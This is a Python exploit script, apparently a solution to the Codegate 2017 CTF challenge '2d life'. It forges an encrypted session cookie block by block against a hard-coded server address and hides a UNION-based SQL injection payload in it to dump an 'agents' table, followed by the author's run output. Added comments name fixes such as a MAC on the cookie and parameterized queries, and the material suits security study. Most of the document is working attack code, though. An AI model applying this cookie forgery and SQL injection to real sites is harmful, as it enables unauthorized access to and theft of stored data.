codegate 2017 2d life
from base64 import b64decode as decode | |
from base64 import b64encode as encode | |
import requests | |
import urllib | |
import re | |
def xor(a, b):
    """Byte-wise XOR of two character sequences, driven by the length of ``a``.

    For every index of ``a`` the ordinal of ``a[k]`` is XORed with the ordinal
    of ``b[k]``.  Only the first ``len(a)`` positions of ``b`` are read; a
    ``b`` shorter than ``a`` raises IndexError, a longer one is truncated.

    Returns:
        A list of single-character strings, one per position of ``a``.
    """
    width = len(a)
    return [chr(ord(a[k]) ^ ord(b[k])) for k in range(width)]
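def show(m, content):
    """Print the matched group, or dump the response tail and stop the script.

    Args:
        m: an ``re`` match object, or None when the pattern did not match.
        content: the raw response body the pattern was applied to.  The
            original body ignored this parameter and read the module global
            ``r.content`` instead; both call sites pass ``r.content``, so
            using the parameter is behaviour-preserving and removes the
            hidden dependency on the global.

    Side effects:
        On no match, prints the last line of ``content`` and the URL-encoded
        cookie held in the module global ``cookie_identify``, then calls
        ``exit()``.  Single-argument ``print(...)`` is used so the function
        reads the same under Python 2 (the rest of this file) and Python 3.
    """
    if m:
        print(repr(m.group(1)))
        return
    # No match: surface the tail of the body and the cookie that produced it
    # for inspection, then stop.
    print(content.split("\n")[-1])
    print(urllib.quote_plus(cookie_identify))
    exit()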
# Cookie: identify=U20iNldnibI%3D%7Ci%2FP0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU%2F90kj9aih1qT7X%2BmyjwEalzVAHA9woq0ZSaOa%2BH7b2nblXS6mrA%3D%3D | |
# U20iNldnibI=|i/P0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU/90kj9aih1qT7X+myjwEalzVAHA9woq0ZSaOa+H7b2nblXS6mrA== | |
# ---------------------------------------------------------------------------
# Python 2 script (print statement, str.decode("hex"), urllib.quote_plus).
#
# Server-side weaknesses this relies on, as far as the file shows: the
# "identify" cookie is accepted after being rebuilt client-side from its two
# base64 halves with no integrity check visible, and the cookie contents
# appear to reach a SQL query (the `pl` string is SQL and the final response
# changes accordingly).  An authenticated cookie (a MAC over the ciphertext,
# verified before any decryption) plus parameterized queries are the usual
# fixes for that pair of issues.
#
# NOTE(review): the 8-byte block size and the XOR-with-previous-block chaining
# below are consistent with a 64-bit block cipher in CBC mode, but the cipher
# is never named in this file — inferred, not confirmed.
# ---------------------------------------------------------------------------

# The two "|"-separated halves of the original cookie, base64-decoded into
# lists of single-byte strings.
cookie_p1_b64 = "U20iNldnibI="
cookie_p2_b64 = "i/P0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU/90kj9aih1qT7X+myjwEalzVAHA9woq0ZSaOa+H7b2nblXS6mrA=="
cookie_p1 = list(decode(cookie_p1_b64))
cookie_p2 = list(decode(cookie_p2_b64))

# Earlier payload attempts, kept by the author.
# pl = ";;0 union select 1,2,3,4,5"
# pl = ";;0 union select * from agents limit 10,1"
# pl = "WTF GGWP ;F14G;0"
pl = ";;0 union select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#"

# Split `pl` into 8-byte chunks with PKCS#7-style padding: a short last chunk
# is padded with bytes whose value equals the pad length; an exact multiple
# of 8 gets one extra block of \x08 appended.
payload = []
for i in range(0,len(pl),8):
    payload.append(pl[i:i+8])
if len(payload[-1])<8:
    payload[-1] += chr(8-len(payload[-1]))*(8-len(payload[-1]))
else:
    payload.append("\x08"*8)

# Two fixed 8-byte values.  The names suggest "intermediate" values recovered
# earlier — inferred from the name only; this file does not show where they
# come from.
imd_1 = list("1e2871651620cc92".decode("hex"))
imd_2 = list("cda1bb2290ffd981".decode("hex"))

# Running tail of the forged second half: starts as bytes 8..15 of the
# original second half and grows by one 8-byte block per loop iteration.
cookie_p2_tmp_e = cookie_p2[8:16]
# Fixed 8-byte filler used for the first half on every non-final iteration;
# ":bongt" is also the marker the response regex below keys on.
dummy = ";g;bongt"

# Walk the chunks from last to first.  Each iteration submits one forged
# cookie and, except on the final (i == 0) pass, reads 8 echoed bytes back
# out of the response to derive the `imd_2` used for the next chunk.
for i in range(len(payload)-1,-1,-1):
    cookie_p2_tmp_s = cookie_p2[:8]
    # Prepend the new block: this chunk XOR imd_2.
    cookie_p2_tmp_e = xor(list(payload[i]), imd_2) + cookie_p2_tmp_e
    if i!=0:
        cookie_p1_tmp = xor(list(dummy), imd_1)
        cookie_p2_tmp = cookie_p2_tmp_s + cookie_p2_tmp_e
    else:
        # Final pass: the first chunk itself becomes the first half.
        cookie_p1_tmp = xor(list(payload[0]), imd_2)
        cookie_p2_tmp = cookie_p2_tmp_e
    # Re-encode both halves, join with "|", URL-encode, send as the cookie.
    cookie_p1_raw = encode("".join(cookie_p1_tmp))
    cookie_p2_raw = encode("".join(cookie_p2_tmp))
    cookie_identify = cookie_p1_raw + "|" + cookie_p2_raw
    cookies = {"identify": urllib.quote_plus(cookie_identify) }
    r = requests.get("http://110.10.212.147:24135/?p=secret_login", cookies=cookies)
    # show() prints the captured group, or prints the response tail and
    # exits the script when the <font size=6> block is absent.
    m = re.search(r"<font size=6>(.+?)</font>", r.content, re.DOTALL)
    show(m, r.content)
    if i!=0:
        # The 8 bytes the server echoed right after ":bongt", XORed with the
        # first 8 bytes of the original second half, become the next imd_2.
        # NOTE(review): no None check here — a response without the marker
        # raises AttributeError on m.group(1) rather than a clear error.
        m = re.search(r"[:]bongt(.{8})", r.content, re.DOTALL)
        imd_2 = xor(cookie_p2[:8], list(m.group(1)))
    else:
        m = re.search(r"Input your ID card, (.+)", r.content)
        show(m, r.content)
# Final forged cookie, URL-encoded, printed once after the loop.
print urllib.quote_plus(cookie_identify)

# Output (transcript of the run, kept by the author as a bare string literal;
# it has no effect on execution).
'''
'Hello, g<br> Your Rank :bongt]\xfa \x88\x07\x9e\x95\xc1'
'Hello, g<br> Your Rank :bongt\xf7\x87\x8f\xa4\xaa\x842\x8cit 11,1#'
'Hello, g<br> Your Rank :bongt\x10\xb79\xdc\x00j\xa3\x16ts)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\xbe\x1d\x84LZ5{\x84rom agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\xbe\xa6\xdd\x9d\xf6\xc1\xda\xb7lect * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\x85B\x87t\xcd\n\xc4\xd6union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\x80\x00\xab@\xf3\xa3\x8c\x96d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongtA\x9d5\x867\x85\x8a\xca,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\x92\xedJ\xd4\x03\\\\\xb4`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\xf9\xe50\xc6k,\xc7Sselect 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\xe9\xe4L\x12\xa7\x9bR\xba,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt:J\x01\x97\xb3a-C 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, g<br> Your Rank :bongt\xe8>\xfc|\xe9\x82\xb18n select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'Hello, <br> Your Rank :0 union select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#'
'/ef84ebb40ab390a1430c233c1f6be444/cfbe97eb17869a6c40f06e62119e7993.png'
WPY4MyxAUY8%3D%7CWPY4MyxAUY%2FfmYadb6jH70ImlE87U%2FdWXiPkz6nvI6Nqe9Le0IT1XaoPocW1SWFyJ8A%2FTCMjMS5q0V8uHcMtLkA7QJ0oTSAKWYsTV8qz0jrpK6CT0aFPoAgHUr86RNI5v3301oYeLTrFqbMqmPfRiTtjstO1KrPd
'''